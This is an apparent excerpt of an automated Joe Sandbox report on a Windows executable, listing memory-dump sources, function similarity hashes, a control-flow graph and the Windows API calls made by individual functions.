                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                          • String ID:
                                          • API String ID: 3536497005-0
                                          • Opcode ID: 731a06aeb1aeb45fbab96b045eb79c55c759261894fecd14d272f4e3d7f6f85d
                                          • Instruction ID: cd233301588df8f2b39f786bd7fa2496c247ce600f8e54c19debd222a777494e
                                          • Opcode Fuzzy Hash: 731a06aeb1aeb45fbab96b045eb79c55c759261894fecd14d272f4e3d7f6f85d
                                          • Instruction Fuzzy Hash: CD610966A18A4185E7209B2EE5003AEA7B1FB9A7A8F501334DF6D07AECCF3DD454C714

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: AutoClassCompareCompleteFindNameStringWindow
                                          • String ID: EDIT
                                          • API String ID: 4243998846-3080729518
                                          • Opcode ID: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                          • Instruction ID: 81d8aa24d6a2bde75d5f579b56593dce37db1f2f1c3c35a1a1ed945aeaf3564b
                                          • Opcode Fuzzy Hash: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                          • Instruction Fuzzy Hash: CB016231B18A4781FA20BB2DE8613F5A390BFBB744FC40431CE4D46679DE2CD549C660

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 3895 7ff7bb242ce0-7ff7bb242d0a 3896 7ff7bb242d0c-7ff7bb242d0e 3895->3896 3897 7ff7bb242d13-7ff7bb242d1b 3895->3897 3900 7ff7bb242ea9-7ff7bb242ec4 call 7ff7bb262320 3896->3900 3898 7ff7bb242d1d-7ff7bb242d28 GetStdHandle 3897->3898 3899 7ff7bb242d2b 3897->3899 3898->3899 3901 7ff7bb242d31-7ff7bb242d3d 3899->3901 3903 7ff7bb242d3f-7ff7bb242d44 3901->3903 3904 7ff7bb242d86-7ff7bb242da2 WriteFile 3901->3904 3906 7ff7bb242daf-7ff7bb242db3 3903->3906 3907 7ff7bb242d46-7ff7bb242d7a WriteFile 3903->3907 3908 7ff7bb242da6-7ff7bb242da9 3904->3908 3910 7ff7bb242ea2-7ff7bb242ea6 3906->3910 3911 7ff7bb242db9-7ff7bb242dbd 3906->3911 3907->3908 3909 7ff7bb242d7c-7ff7bb242d82 3907->3909 3908->3906 3908->3910 3909->3907 3912 7ff7bb242d84 3909->3912 3910->3900 3911->3910 3913 7ff7bb242dc3-7ff7bb242dd8 call 7ff7bb23b4f8 3911->3913 3912->3908 3916 7ff7bb242dda-7ff7bb242de1 3913->3916 3917 7ff7bb242e1e-7ff7bb242e6d call 7ff7bb26797c call 7ff7bb23129c call 7ff7bb23bca8 3913->3917 3916->3901 3919 7ff7bb242de7-7ff7bb242de9 3916->3919 3917->3910 3928 7ff7bb242e6f-7ff7bb242e86 3917->3928 3919->3901 3920 7ff7bb242def-7ff7bb242e19 3919->3920 3920->3901 3929 7ff7bb242e88-7ff7bb242e9b 3928->3929 3930 7ff7bb242e9d call 7ff7bb26220c 3928->3930 3929->3930 3931 7ff7bb242ec5-7ff7bb242ecb call 7ff7bb267904 3929->3931 3930->3910
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: FileWrite$Handle
                                          • String ID:
                                          • API String ID: 4209713984-0
                                          • Opcode ID: c0878563cb540de980db5307815f43949119fc8f7ca07e724854b0feeef95fd0
                                          • Instruction ID: 5ee871f96460ce1f0b226c17d948130afb94fedd072cf12ff8f6d046ce22e7c3
                                          • Opcode Fuzzy Hash: c0878563cb540de980db5307815f43949119fc8f7ca07e724854b0feeef95fd0
                                          • Instruction Fuzzy Hash: F151EA22B2994282FA55AB2ED9447FAA350FF66B90F840131DF4D47AB8DF7CE445C320

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: _invalid_parameter_noinfo_noreturn$ItemText
                                          • String ID:
                                          • API String ID: 3750147219-0
                                          • Opcode ID: 4545a4d965027abc5525eaa64a011eb323a3d8b8803950167f2ec84c55f0684f
                                          • Instruction ID: 5221f54e3f6d42f96e7eb2cff92bc51733991e19993980531a2491022414c3f4
                                          • Opcode Fuzzy Hash: 4545a4d965027abc5525eaa64a011eb323a3d8b8803950167f2ec84c55f0684f
                                          • Instruction Fuzzy Hash: 6F518162F2465184FB04AB6DD8842ED6321BB6AB94F800635DF1D56AFDDF68D440C320
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: ErrorLast$FileHandleRead
                                          • String ID:
                                          • API String ID: 2244327787-0
                                          • Opcode ID: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
                                          • Instruction ID: dc76b0c25d77c66ed6191c51555fb86421ccc96dc039c37f9255f16aac650119
                                          • Opcode Fuzzy Hash: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
                                          • Instruction Fuzzy Hash: 07216B21A2CD4181E6606B1FA4002B9EB70FB67B94F944531DF5D4AAACCF7CD8858762
                                          APIs
                                            • Part of subcall function 00007FF7BB24ECD8: ResetEvent.KERNEL32 ref: 00007FF7BB24ECF1
                                            • Part of subcall function 00007FF7BB24ECD8: ReleaseSemaphore.KERNEL32 ref: 00007FF7BB24ED07
                                          • ReleaseSemaphore.KERNEL32 ref: 00007FF7BB24E974
                                          • FindCloseChangeNotification.KERNELBASE ref: 00007FF7BB24E993
                                          • DeleteCriticalSection.KERNEL32 ref: 00007FF7BB24E9AA
                                          • CloseHandle.KERNEL32 ref: 00007FF7BB24E9B7
                                            • Part of subcall function 00007FF7BB24EA5C: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF7BB24E95F,?,?,?,00007FF7BB24463A,?,?,?), ref: 00007FF7BB24EA63
                                            • Part of subcall function 00007FF7BB24EA5C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7BB24E95F,?,?,?,00007FF7BB24463A,?,?,?), ref: 00007FF7BB24EA6E
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: CloseReleaseSemaphore$ChangeCriticalDeleteErrorEventFindHandleLastNotificationObjectResetSectionSingleWait
                                          • String ID:
                                          • API String ID: 2143293610-0
                                          • Opcode ID: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
                                          • Instruction ID: 008d42f74970035718fe5e222e370ad8cc889a00a26e1b6d69e8faacdfc8dfbf
                                          • Opcode Fuzzy Hash: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
                                          • Instruction Fuzzy Hash: E8012D32A18A9192E649BB2AE5442ADB320FB95B80F404031DF6D07A69CF39E5B48754
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: Thread$CreatePriority
                                          • String ID: CreateThread failed
                                          • API String ID: 2610526550-3849766595
                                          • Opcode ID: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
                                          • Instruction ID: 35f8dee46e6b8282faf522ec3298237cdf9c6d07e9957b09846db64fecacf583
                                          • Opcode Fuzzy Hash: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
                                          • Instruction Fuzzy Hash: E1113A31A18A4285F705BB2DE8412EAB360FBA5B84F944131DF8D0267DDF7CE5858724
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: DirectoryInitializeMallocSystem
                                          • String ID: riched20.dll
                                          • API String ID: 174490985-3360196438
                                          • Opcode ID: b1936b3f38021c99ecd6522b050f6163774a90ef7a51b133bb98bdb322c125e4
                                          • Instruction ID: 5e11fccdfeb2a82176741057aab3304d5d7e32922f70cc125f46c91e2888b077
                                          • Opcode Fuzzy Hash: b1936b3f38021c99ecd6522b050f6163774a90ef7a51b133bb98bdb322c125e4
                                          • Instruction Fuzzy Hash: 02F03171618A4182EB00AF28E4142AAB3A0FB69754F800135EE8D42768DF7CD55DCB10
                                          APIs
                                            • Part of subcall function 00007FF7BB25853C: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF7BB25856C
                                            • Part of subcall function 00007FF7BB24AAE0: LoadStringW.USER32 ref: 00007FF7BB24AB67
                                            • Part of subcall function 00007FF7BB24AAE0: LoadStringW.USER32 ref: 00007FF7BB24AB80
                                            • Part of subcall function 00007FF7BB231FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB231FFB
                                            • Part of subcall function 00007FF7BB23129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7BB231396
                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB2601BB
                                          • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7BB2601C1
                                          • SendDlgItemMessageW.USER32 ref: 00007FF7BB2601F2
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
                                          • String ID:
                                          • API String ID: 3106221260-0
                                          • Opcode ID: 48f7460856490a08a1dfbaf42e0e8179e100db638ce86cb13893e8b540cb7b7b
                                          • Instruction ID: 2e5bd5cb2217b56a35222601de8e6045fada50304f52adad6f28cb1ef133a7fd
                                          • Opcode Fuzzy Hash: 48f7460856490a08a1dfbaf42e0e8179e100db638ce86cb13893e8b540cb7b7b
                                          • Instruction Fuzzy Hash: 2951A262F056414AFB00ABADD4552FDA362BBAAB84F800135DF4E57BEEDE2CD504C360
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                          • String ID:
                                          • API String ID: 2272807158-0
                                          • Opcode ID: fadebd8b54f10f1951c29d3e9f7df512abc916790a43b14df76b265dc45515ba
                                          • Instruction ID: 2328edfbe221f274979467f023f580ff18125e12ad2ba5b7b5466f74d87974d2
                                          • Opcode Fuzzy Hash: fadebd8b54f10f1951c29d3e9f7df512abc916790a43b14df76b265dc45515ba
                                          • Instruction Fuzzy Hash: 8841C872A18B8182EB109B1EE4442A9B361FB967B4F505334DFAD07EE9CF3CD4908714
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                          • String ID:
                                          • API String ID: 2176759853-0
                                          • Opcode ID: 107cbe78643896cd277503af9d79c84134f19e12336bfdef765791961383781f
                                          • Instruction ID: 5bc3202e25cd5eebc9e4f42ebaad67d4309c9eaa6e36f5ddd9ccbb148a82aa3f
                                          • Opcode Fuzzy Hash: 107cbe78643896cd277503af9d79c84134f19e12336bfdef765791961383781f
                                          • Instruction Fuzzy Hash: 35219372A19B8181EA10AB6DA4401BEA364FB9EBD0F545235EFDD03BA9DF3CD190C700
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: std::bad_alloc::bad_alloc
                                          • String ID:
                                          • API String ID: 1875163511-0
                                          • Opcode ID: 7fdfb8b08260a68de66ecd622df27e98485fdb680c183650925e5cdb3d7d3185
                                          • Instruction ID: c13727b025a748e2ac3b0b1bc539e9cf32afa203f5f9a53090dd2e494e3e1584
                                          • Opcode Fuzzy Hash: 7fdfb8b08260a68de66ecd622df27e98485fdb680c183650925e5cdb3d7d3185
                                          • Instruction Fuzzy Hash: 4B317012A09A4651FB24AB1CE4883F9A3A0FB76784F944431DB8C065FDDF7CE946C321
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                          • String ID:
                                          • API String ID: 3118131910-0
                                          • Opcode ID: 72c673f2880adfe6ea93f0d9f4cbebf29628e435fcdd813aa7a5852a82454db7
                                          • Instruction ID: ea5ef500a96afdda3ed749111f104c59ab6107285b81da4c5bde7c6cfd806972
                                          • Opcode Fuzzy Hash: 72c673f2880adfe6ea93f0d9f4cbebf29628e435fcdd813aa7a5852a82454db7
                                          • Instruction Fuzzy Hash: F1218E22A1878181EA10DB2DF4451AEB360FB9AB94F901234EF9D46ABDDF3CD541C614
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                          • String ID:
                                          • API String ID: 1203560049-0
                                          • Opcode ID: 40ad9405655d088623e5613f9ff1dd24c057f9c22428089c7716efbf5db7ae43
                                          • Instruction ID: 19752029ca115a574a8d4e080f51b934d80ae4b377ee5d7031105cc3a370b908
                                          • Opcode Fuzzy Hash: 40ad9405655d088623e5613f9ff1dd24c057f9c22428089c7716efbf5db7ae43
                                          • Instruction Fuzzy Hash: 6021A722A18A8181EA10AB2DF4441A9A361FBDABA4F900231EF9D47BFDDF3CD440C654
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID:
                                          • API String ID: 1703294689-0
                                          • Opcode ID: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                                          • Instruction ID: 05c5df3a1b1d5ff9259aed8fe8262e2920fe33e090c79aba8bdc52c7bca80a51
                                          • Opcode Fuzzy Hash: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                                          • Instruction Fuzzy Hash: 59E01218A0430546EA547B6E58553F953527F6E741F504438DE0F473BACD3DA8094721
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB294000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440904646.00007FF7BB29E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7ff7bb230000_Desktop.jbxd
                                          Similarity
                                          • API ID: _invalid_parameter_noinfo_noreturn
                                          • String ID:
                                          • API String ID: 3668304517-0
                                          • Opcode ID: 201b90534166b8da7461634ac6a816a56932a3fdfe7bfd1a1f820e126a9c965b
                                          • Instruction ID: bb52c3863965e60fbeca68176add93a36e2d9633a54f4c6de0e1ad944d82ccb8
                                          • Opcode Fuzzy Hash: 201b90534166b8da7461634ac6a816a56932a3fdfe7bfd1a1f820e126a9c965b
                                          • Instruction Fuzzy Hash: 4641C322F1865188FB00EBBDD4502EDA360BF66B94F941135DF5D27AEECE38D5868310
                                          APIs
                                          • SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF7BB24274D), ref: 00007FF7BB2428A9
                                          • GetLastError.KERNEL32(?,00007FF7BB24274D), ref: 00007FF7BB2428B8
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1440788917.00007FF7BB231000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7BB230000, based on PE: true
                                          • Associated: 00000005.00000002.1440764398.00007FF7BB230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.1440860655.00007FF7BB28B000.00000004.00000001.01000000.00000004.sdmpDownload File
